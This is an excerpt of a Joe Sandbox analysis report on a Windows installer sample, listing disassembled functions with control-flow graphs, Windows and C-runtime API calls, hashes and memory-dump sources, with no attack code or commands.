                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CreateObjectProcessSingleWait
                                      • String ID: D
                                      • API String ID: 2059082233-2746444292
                                      • Opcode ID: 054325de75e6e59eabdaf36df273f4d8c3efc817c023a628a9b7181ea68f377a
                                      • Instruction ID: 7d6d82e28a96a4384aabe9d302e590db284300cdfec04059a63c4cd8c7c074ea
                                      • Opcode Fuzzy Hash: 054325de75e6e59eabdaf36df273f4d8c3efc817c023a628a9b7181ea68f377a
                                      • Instruction Fuzzy Hash: CE31F2B18193808FD740DF2AD18872AFBF0ABAA318F505A1EF8D986760D7759584CF43
                                      Function 6CB7F34E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4477 6cb7f34e-6cb7f36a 4478 6cb7f370-6cb7f372 4477->4478 4479 6cb7f529 4477->4479 4480 6cb7f394-6cb7f3b5 4478->4480 4481 6cb7f374-6cb7f387 call 6cb730cf call 6cb730bc call 6cb73810 4478->4481 4482 6cb7f52b-6cb7f52f 4479->4482 4483 6cb7f3b7-6cb7f3ba 4480->4483 4484 6cb7f3bc-6cb7f3c2 4480->4484 4499 6cb7f38c-6cb7f38f 4481->4499 4483->4484 4486 6cb7f3c4-6cb7f3c9 4483->4486 4484->4481 4484->4486 4488 6cb7f3cb-6cb7f3d7 call 6cb7e359 4486->4488 4489 6cb7f3da-6cb7f3eb call 6cb7f530 4486->4489 4488->4489 4497 6cb7f3ed-6cb7f3ef 4489->4497 4498 6cb7f42c-6cb7f43e 4489->4498 4502 6cb7f416-6cb7f422 call 6cb7f5a1 4497->4502 4503 6cb7f3f1-6cb7f3f9 4497->4503 4500 6cb7f485-6cb7f4a7 WriteFile 4498->4500 4501 6cb7f440-6cb7f449 4498->4501 4499->4482 4504 6cb7f4b2 4500->4504 4505 6cb7f4a9-6cb7f4af GetLastError 4500->4505 4507 6cb7f475-6cb7f483 call 6cb7f9b3 4501->4507 4508 6cb7f44b-6cb7f44e 4501->4508 4511 6cb7f427-6cb7f42a 4502->4511 4509 6cb7f3ff-6cb7f40c call 6cb7f94b 4503->4509 4510 6cb7f4bb-6cb7f4be 4503->4510 4512 6cb7f4b5-6cb7f4ba 4504->4512 4505->4504 4507->4511 4513 6cb7f465-6cb7f473 call 6cb7fb77 4508->4513 4514 6cb7f450-6cb7f453 4508->4514 4518 6cb7f40f-6cb7f411 4509->4518 4515 6cb7f4c1-6cb7f4c6 4510->4515 4511->4518 4512->4510 4513->4511 4514->4515 4521 6cb7f455-6cb7f463 call 6cb7fa8e 4514->4521 4519 6cb7f524-6cb7f527 4515->4519 4520 6cb7f4c8-6cb7f4cd 4515->4520 4518->4512 4519->4482 4526 6cb7f4cf-6cb7f4d4 4520->4526 4527 6cb7f4f9-6cb7f505 4520->4527 4521->4511 4531 6cb7f4d6-6cb7f4e8 call 6cb730bc call 6cb730cf 4526->4531 4532 6cb7f4ed-6cb7f4f4 call 6cb730e2 4526->4532 4529 6cb7f507-6cb7f50a 4527->4529 4530 6cb7f50c-6cb7f51f call 6cb730bc call 6cb730cf 4527->4530 4529->4479 4529->4530 4530->4499 4531->4499 4532->4499
                                      APIs
                                        • Part of subcall function 6CB7F5A1: GetConsoleCP.KERNEL32(?,6CB7E7C0,?), ref: 6CB7F5E9
                                      • WriteFile.KERNEL32(?,?,6CB87DDC,00000000,00000000,?,00000000,00000000,6CB891A6,00000000,00000000,?,00000000,6CB7E7C0,6CB87DDC,00000000), ref: 6CB7F49F
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CB87DDC,6CB7E7C0,00000000,?,?,?,?,00000000,?), ref: 6CB7F4A9
                                      • __dosmaperr.LIBCMT ref: 6CB7F4EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                      • String ID: 8Q
                                      • API String ID: 251514795-4022487301
                                      • Opcode ID: 3720789ba1b58f005738adfe3a19ffd6a4ccabbfffe856476174a2aecadba97f
                                      • Instruction ID: 91b2adf1b9ed88a8f8d60c95ad156bbaabc3d8b3ea76230b8dce46771d3fbc90
                                      • Opcode Fuzzy Hash: 3720789ba1b58f005738adfe3a19ffd6a4ccabbfffe856476174a2aecadba97f
                                      • Instruction Fuzzy Hash: B951E671A0428AAFDF21CFA8C880BEEBBB9EF0A358F140555DC30A7A41D774D9458779
                                      Function 6CB69280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4544 6cb69280-6cb6928c 4545 6cb6928e-6cb69299 4544->4545 4546 6cb692cd 4544->4546 4547 6cb692af-6cb692bc call 6ca301f0 call 6cb74208 4545->4547 4548 6cb6929b-6cb692ad 4545->4548 4549 6cb692cf-6cb69347 4546->4549 4557 6cb692c1-6cb692cb 4547->4557 4548->4547 4551 6cb69373-6cb69379 4549->4551 4552 6cb69349-6cb69371 4549->4552 4552->4551 4554 6cb6937a-6cb69439 call 6ca32250 call 6ca32340 call 6cb6ca69 call 6ca2e010 call 6cb6a778 4552->4554 4557->4549
                                      APIs
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CB69421
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Ios_base_dtorstd::ios_base::_
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 323602529-1866435925
                                      • Opcode ID: 40fa7e348482be8d907f9ca8ba4123da7bd5e060761243721a043b4e0851e713
                                      • Instruction ID: 1a7d75e94dab0b23992440f6b6343f89840feafcd6e51ccac7a5e20c78cac342
                                      • Opcode Fuzzy Hash: 40fa7e348482be8d907f9ca8ba4123da7bd5e060761243721a043b4e0851e713
                                      • Instruction Fuzzy Hash: FE5134B5900B408FD725CF26C585BA7BBF1FB49318F008A2DD8964BB91D775A909CF90
                                      Function 6CB3CEA0 Relevance: 6.2, APIs: 4, Instructions: 187fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4567 6cb3cea0-6cb3cf03 call 6cb6a260 4570 6cb3cf40-6cb3cf49 4567->4570 4571 6cb3cf90-6cb3cf95 4570->4571 4572 6cb3cf4b-6cb3cf50 4570->4572 4575 6cb3d030-6cb3d035 4571->4575 4576 6cb3cf9b-6cb3cfa0 4571->4576 4573 6cb3d000-6cb3d005 4572->4573 4574 6cb3cf56-6cb3cf5b 4572->4574 4583 6cb3d125-6cb3d158 call 6cb6ea90 4573->4583 4584 6cb3d00b-6cb3d010 4573->4584 4579 6cb3cf61-6cb3cf66 4574->4579 4580 6cb3d065-6cb3d08c 4574->4580 4577 6cb3d03b-6cb3d040 4575->4577 4578 6cb3d17d-6cb3d191 4575->4578 4581 6cb3cfa6-6cb3cfab 4576->4581 4582 6cb3cf05-6cb3cf21 WriteFile 4576->4582 4587 6cb3d1a7-6cb3d1ac 4577->4587 4588 6cb3d046-6cb3d060 4577->4588 4595 6cb3d195-6cb3d1a2 4578->4595 4589 6cb3d091-6cb3d0aa WriteFile 4579->4589 4590 6cb3cf6c-6cb3cf71 4579->4590 4591 6cb3cf33-6cb3cf38 4580->4591 4593 6cb3cfb1-6cb3cfb6 4581->4593 4594 6cb3d0af-6cb3d120 WriteFile 4581->4594 4596 6cb3cf30 4582->4596 4583->4570 4585 6cb3d016-6cb3d01b 4584->4585 4586 6cb3d15d-6cb3d175 4584->4586 4585->4570 4598 6cb3d021-6cb3d02b 4585->4598 4586->4578 4587->4570 4597 6cb3d1b2-6cb3d1c0 4587->4597 4588->4595 4589->4596 4590->4570 4599 6cb3cf73-6cb3cf86 4590->4599 4591->4570 4593->4570 4601 6cb3cfb8-6cb3cfee call 6cb6f010 ReadFile 4593->4601 4594->4596 4595->4570 4596->4591 4598->4596 4599->4591 4601->4596
                                      APIs
                                      • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CB3CFE1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 6e21b3e226c63f07bbdd708b3194a026d6f94efb41618eb29b714e2bdca4250c
                                      • Instruction ID: 8c6da49f3dc83d8c49788008da5bba083236f101bd9d8a7853cdcc752ad48a54
                                      • Opcode Fuzzy Hash: 6e21b3e226c63f07bbdd708b3194a026d6f94efb41618eb29b714e2bdca4250c
                                      • Instruction Fuzzy Hash: 1B714EB0259390AFDB10DF69C884B9ABBF4FF89708F50592EF498C6650D375D9488F82
                                      Function 6CB3C390 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 631COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4626 6cb3c390-6cb3c406 call 6cb6a260 call 6cb6f010 4631 6cb3c426-6cb3c42f 4626->4631 4632 6cb3c431-6cb3c436 4631->4632 4633 6cb3c490-6cb3c495 4631->4633 4634 6cb3c500-6cb3c505 4632->4634 4635 6cb3c43c-6cb3c441 4632->4635 4636 6cb3c570-6cb3c575 4633->4636 4637 6cb3c49b-6cb3c4a0 4633->4637 4640 6cb3c50b-6cb3c510 4634->4640 4641 6cb3c679-6cb3c67e 4634->4641 4638 6cb3c447-6cb3c44c 4635->4638 4639 6cb3c5bf-6cb3c5c4 4635->4639 4642 6cb3c6d6-6cb3c6db 4636->4642 4643 6cb3c57b-6cb3c580 4636->4643 4644 6cb3c4a6-6cb3c4ab 4637->4644 4645 6cb3c638-6cb3c63d 4637->4645 4654 6cb3c742-6cb3c747 4638->4654 4655 6cb3c452-6cb3c457 4638->4655 4652 6cb3c863-6cb3c868 4639->4652 4653 6cb3c5ca-6cb3c5cf 4639->4653 4656 6cb3c516-6cb3c51b 4640->4656 4657 6cb3c7de-6cb3c7e3 4640->4657 4660 6cb3c8e2-6cb3c8e7 4641->4660 4661 6cb3c684-6cb3c689 4641->4661 4650 6cb3c912-6cb3c917 4642->4650 4651 6cb3c6e1-6cb3c6e6 4642->4651 4646 6cb3c830-6cb3c835 4643->4646 4647 6cb3c586-6cb3c58b 4643->4647 4648 6cb3c4b1-6cb3c4b6 4644->4648 4649 6cb3c796-6cb3c79b 4644->4649 4658 6cb3c643-6cb3c648 4645->4658 4659 6cb3c8ab-6cb3c8b0 4645->4659 4680 6cb3c83b-6cb3c840 4646->4680 4681 6cb3cd6c-6cb3cd88 4646->4681 4676 6cb3c591-6cb3c596 4647->4676 4677 6cb3c9fe-6cb3ca3a 4647->4677 4664 6cb3c97a-6cb3c984 4648->4664 4665 6cb3c4bc-6cb3c4c1 4648->4665 4674 6cb3c7a1-6cb3c7a6 4649->4674 4675 6cb3c408-6cb3c418 4649->4675 4666 6cb3ce1a-6cb3ce29 4650->4666 4667 6cb3c91d-6cb3c922 4650->4667 4668 6cb3cc12-6cb3cc4d call 6cb6f010 call 6cb3b4d0 4651->4668 4669 6cb3c6ec-6cb3c6f1 4651->4669 4684 6cb3cdb7-6cb3cdbf 4652->4684 4685 6cb3c86e-6cb3c873 4652->4685 4682 6cb3ca71-6cb3ca9b call 6cb6ea90 4653->4682 4683 6cb3c5d5-6cb3c5da 4653->4683 4670 6cb3cca3-6cb3ccba 4654->4670 4671 6cb3c74d-6cb3c752 4654->4671 4686 6cb3c93d-6cb3c95b 4655->4686 4687 6cb3c45d-6cb3c462 4655->4687 4672 6cb3c9a3-6cb3c9b3 4656->4672 4673 6cb3c521-6cb3c526 4656->4673 4678 6cb3ccfa-6cb3cd23 4657->4678 4679 6cb3c7e9-6cb3c7ee 4657->4679 4688 6cb3cb08-6cb3cb34 4658->4688 4689 6cb3c64e-6cb3c653 4658->4689 4690 6cb3c8b6-6cb3c8bb 4659->4690 4691 6cb3cdda-6cb3cdf1 4659->4691 4692 6cb3cdf9-6cb3ce12 4660->4692 4693 6cb3c8ed-6cb3c8f2 4660->4693 4662 6cb3cb61-6cb3cb85 4661->4662 4663 6cb3c68f-6cb3c694 4661->4663 4662->4631 4709 6cb3cb8a-6cb3cc0d 4663->4709 4710 6cb3c69a-6cb3c69f 4663->4710 4664->4631 4695 6cb3c4c7-6cb3c4cc 4665->4695 4696 6cb3c989-6cb3c99e 4665->4696 4724 6cb3ce31-6cb3ce36 4666->4724 4667->4631 4697 6cb3c928-6cb3c938 4667->4697 4752 6cb3cc52-6cb3cc72 4668->4752 4712 6cb3cc77-6cb3cc88 4669->4712 4713 6cb3c6f7-6cb3c6fc 4669->4713 4711 6cb3ccbc-6cb3ccc4 4670->4711 4714 6cb3ccc9-6cb3ccd8 4671->4714 4715 6cb3c758-6cb3c75d 4671->4715 4699 6cb3c9bd-6cb3c9c5 4672->4699 4673->4699 4700 6cb3c52c-6cb3c531 4673->4700 4717 6cb3cce0-6cb3ccf5 4674->4717 4718 6cb3c7ac-6cb3c7b1 4674->4718 4721 6cb3c41d 4675->4721 4702 6cb3ca43-6cb3ca6c 4676->4702 4703 6cb3c59c-6cb3c5a1 4676->4703 4677->4702 4678->4631 4719 6cb3c7f4-6cb3c7f9 4679->4719 4720 6cb3cd28-6cb3cd67 4679->4720 4722 6cb3c846-6cb3c84b 4680->4722 4723 6cb3cd9d-6cb3cdad 4680->4723 4698 6cb3cd8a-6cb3cd98 4681->4698 4682->4631 4704 6cb3caa0-6cb3cb03 call 6cb3ce50 CreateFileA 4683->4704 4705 6cb3c5e0-6cb3c5e5 4683->4705 4716 6cb3cdc4-6cb3cdd5 4684->4716 4685->4724 4725 6cb3c879-6cb3c8a6 4685->4725 4686->4698 4726 6cb3c960-6cb3c975 4687->4726 4727 6cb3c468-6cb3c46d 4687->4727 4688->4631 4707 6cb3cb39-6cb3cb5c 4689->4707 4708 6cb3c659-6cb3c65e 4689->4708 4690->4631 4728 6cb3c8c1-6cb3c8dd 4690->4728 4691->4692 4692->4666 4693->4631 4694 6cb3c8f8-6cb3c90d 4693->4694 4694->4631 4695->4631 4729 6cb3c4d2-6cb3c4fa call 6cb32a20 call 6cb32a30 4695->4729 4730 6cb3c420-6cb3c424 4696->4730 4697->4716 4698->4631 4731 6cb3c9ca-6cb3c9f9 4699->4731 4700->4631 4732 6cb3c537-6cb3c561 4700->4732 4702->4631 4703->4631 4734 6cb3c5a7-6cb3c5ba 4703->4734 4704->4631 4705->4631 4736 6cb3c5eb-6cb3c633 4705->4736 4707->4631 4708->4631 4738 6cb3c664-6cb3c674 4708->4738 4709->4631 4710->4631 4740 6cb3c6a5-6cb3c6d1 4710->4740 4711->4631 4739 6cb3cc8d-6cb3cc9e 4712->4739 4713->4631 4741 6cb3c702-6cb3c73d 4713->4741 4714->4717 4715->4631 4742 6cb3c763-6cb3c791 4715->4742 4716->4631 4717->4721 4718->4631 4743 6cb3c7b7-6cb3c7d9 4718->4743 4719->4631 4744 6cb3c7ff-6cb3c82b 4719->4744 4720->4631 4721->4730 4722->4631 4746 6cb3c851-6cb3c85e 4722->4746 4723->4684 4724->4631 4745 6cb3ce3c-6cb3ce47 4724->4745 4725->4631 4726->4631 4727->4631 4747 6cb3c46f-6cb3c483 4727->4747 4728->4739 4729->4631 4730->4631 4731->4631 4732->4631 4734->4631 4736->4631 4738->4731 4739->4631 4740->4631 4741->4631 4742->4711 4743->4698 4744->4631 4746->4731 4747->4716 4752->4631
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @*Z$@*Z
                                      • API String ID: 0-2842812045
                                      • Opcode ID: ae9741cba97f634a4643da7a884dc47f3702ccf00dd6900d4e2d9c4f41152a4b
                                      • Instruction ID: 46922d2d7bae48d781af239d90337d4e52225a35853106a26b7350e71b8b2c26
                                      • Opcode Fuzzy Hash: ae9741cba97f634a4643da7a884dc47f3702ccf00dd6900d4e2d9c4f41152a4b
                                      • Instruction Fuzzy Hash: A04268746093A28FCB14DF68C48166EBBE1ABC9304F245E2EF49AC7761D331D9458B43
                                      Function 6CB7F015 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4755 6cb7f015-6cb7f029 call 6cb84c92 4758 6cb7f02f-6cb7f037 4755->4758 4759 6cb7f02b-6cb7f02d 4755->4759 4760 6cb7f042-6cb7f045 4758->4760 4761 6cb7f039-6cb7f040 4758->4761 4762 6cb7f07d-6cb7f09d call 6cb84e0f 4759->4762 4764 6cb7f047-6cb7f04b 4760->4764 4765 6cb7f063-6cb7f073 call 6cb84c92 CloseHandle 4760->4765 4761->4760 4763 6cb7f04d-6cb7f061 call 6cb84c92 * 2 4761->4763 4772 6cb7f09f-6cb7f0a9 call 6cb730e2 4762->4772 4773 6cb7f0ab 4762->4773 4763->4759 4763->4765 4764->4763 4764->4765 4765->4759 4777 6cb7f075-6cb7f07b GetLastError 4765->4777 4775 6cb7f0ad-6cb7f0b0 4772->4775 4773->4775 4777->4762
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,6CB8794F), ref: 6CB7F06B
                                      • GetLastError.KERNEL32(?,00000000,?,6CB8794F), ref: 6CB7F075
                                      • __dosmaperr.LIBCMT ref: 6CB7F0A0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CloseErrorHandleLast__dosmaperr
                                      • String ID:
                                      • API String ID: 2583163307-0
                                      • Opcode ID: 9d735fff4398a8041f972015c862c1bb29d06f1ea445f847aa02d69fe0bedc25
                                      • Instruction ID: c199874004fd966ab2fa477d769347dd1d39365da1cb11ce865b4157fa2ca42e
                                      • Opcode Fuzzy Hash: 9d735fff4398a8041f972015c862c1bb29d06f1ea445f847aa02d69fe0bedc25
                                      • Instruction Fuzzy Hash: 8A018E3370A2E01AC2311A39996CBBE6B6DCB8373CF294659ED3487BC0DF60844447B5
                                      Function 6CB7428C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 5000 6cb7428c-6cb74297 5001 6cb742ae-6cb742bb 5000->5001 5002 6cb74299-6cb742ac call 6cb730bc call 6cb73810 5000->5002 5004 6cb742f6-6cb742ff call 6cb7e565 5001->5004 5005 6cb742bd-6cb742d2 call 6cb743a9 call 6cb7be2e call 6cb7d350 call 6cb7ef88 5001->5005 5013 6cb74300-6cb74302 5002->5013 5004->5013 5019 6cb742d7-6cb742dc 5005->5019 5020 6cb742e3-6cb742e7 5019->5020 5021 6cb742de-6cb742e1 5019->5021 5020->5004 5022 6cb742e9-6cb742f5 call 6cb77eab 5020->5022 5021->5004 5022->5004
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8Q
                                      • API String ID: 0-4022487301
                                      • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                      • Instruction ID: 5354c7b07723b1dcdf0313df45b0bd9720e1f70aa9946b7104b9f7a78012cf0c
                                      • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                      • Instruction Fuzzy Hash: 91F0AD325156A05AD7315A299C007DF32A8CF4237AF210B15ED34A6ED0DB74D40A8FB6
                                      Function 6CB69050 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CB691A4
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CB691E4
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Ios_base_dtorstd::ios_base::_
                                      • String ID:
                                      • API String ID: 323602529-0
                                      • Opcode ID: 572c7429199bc4ba0d015fffd0ce12a13fd3e369b46dba30da99b86abfcf9a13
                                      • Instruction ID: 4090a7c840773efaa14488dcfb187642af73c57dd40114697cfba1c6299d8353
                                      • Opcode Fuzzy Hash: 572c7429199bc4ba0d015fffd0ce12a13fd3e369b46dba30da99b86abfcf9a13
                                      • Instruction Fuzzy Hash: 10516671601B40DBD725CF25C884BE6BBF4FB05718F448A1CD4AA8BBA1CB31B949CB80
                                      Function 6CB7262F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(6CB99DD0,0000000C), ref: 6CB72642
                                      • ExitThread.KERNEL32 ref: 6CB72649
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorExitLastThread
                                      • String ID:
                                      • API String ID: 1611280651-0
                                      • Opcode ID: c5bc9faf4f94a5a09eb6a07a21afbe86660ea4911f56a5c7537d7c574e92d9cf
                                      • Instruction ID: 765d17b86a3f1257f44ae21c65573d10b5c6c06f9cd95149a98024799fa3b605
                                      • Opcode Fuzzy Hash: c5bc9faf4f94a5a09eb6a07a21afbe86660ea4911f56a5c7537d7c574e92d9cf
                                      • Instruction Fuzzy Hash: B7F0C271A00245EFDF109FB1C84DAAE3B74FF46714F240549E821A7B51CB719945CBB2
                                      Function 6CB7E662 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
